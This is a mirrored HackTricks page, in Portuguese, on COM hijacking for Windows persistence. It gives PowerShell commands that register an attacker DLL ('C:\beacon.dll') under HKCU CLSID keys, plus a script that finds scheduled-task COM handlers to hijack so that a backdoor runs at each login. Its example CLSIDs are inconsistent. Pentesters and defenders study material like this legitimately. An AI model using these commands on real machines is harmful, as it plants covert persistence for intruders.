Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-12-18 17:16:10 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/windows-local-privilege-escalation/com-hijacking.md
Translator workflow c928d8e52e Translated to Portuguese
2023-06-06 18:56:34 +00:00

6.4 KiB
Raw Blame History

COM Hijacking

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Procurando componentes COM inexistentes

Como os valores de HKCU podem ser modificados pelos usuários, o COM Hijacking pode ser usado como um mecanismo persistente. Usando o procmon, é fácil encontrar registros COM pesquisados que não existem e que um invasor poderia criar para persistir. Filtros:

  • Operações RegOpenKey.
  • onde o Resultado é NOME NÃO ENCONTRADO.
  • e o Caminho termina com InprocServer32.

Depois de decidir qual COM inexistente se passar, execute os seguintes comandos. Tenha cuidado se decidir se passar por um COM que é carregado a cada poucos segundos, pois isso pode ser excessivo. 

New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"

Componentes COM do Agendador de Tarefas suscetíveis a sequestro

As Tarefas do Windows usam, na verdade, Gatilhos Personalizados para chamar objetos COM. E, como são executados por meio do Agendador de Tarefas, é mais fácil prever quando serão acionados.

# Mostrar CLSIDs COM
$Tasks = Get-ScheduledTask

foreach ($Task in $Tasks)
{
  if ($Task.Actions.ClassId -ne $null)
  {
    if ($Task.Triggers.Enabled -eq $true)
    {
      $usersSid = "S-1-5-32-545"
      $usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }

      if ($Task.Principal.GroupId -eq $usersGroup)
      {
        Write-Host "Nome da Tarefa: " $Task.TaskName
        Write-Host "Caminho da Tarefa: " $Task.TaskPath
        Write-Host "CLSID: " $Task.Actions.ClassId
        Write-Host
      }
    }
  }
}

# Saída de exemplo:
# Nome da Tarefa:  Exemplo
# Caminho da Tarefa:  \Microsoft\Windows\Exemplo\
# CLSID:  {1936ED8A-BD93-3213-E325-F38D112938E1}
# [mais saídas como a anterior...]

Verificando a saída, você pode selecionar uma que será executada sempre que um usuário fizer login, por exemplo.

Agora, procurando pelo CLSID {1936ED8A-BD93-3213-E325-F38D112938EF} em HKEY_CLASSES_ROOT\CLSID e em HKLM e HKCU, geralmente você descobrirá que o valor não existe em HKCU.

# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"

Name           Property
----           --------
InprocServer32 (default)      : C:\Windows\system32\some.dll
               ThreadingModel : Both

# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize

Name                                   Property
----                                   --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler

# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.

Então, você pode simplesmente criar a entrada HKCU e toda vez que o usuário fizer login, sua porta dos fundos será ativada.

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥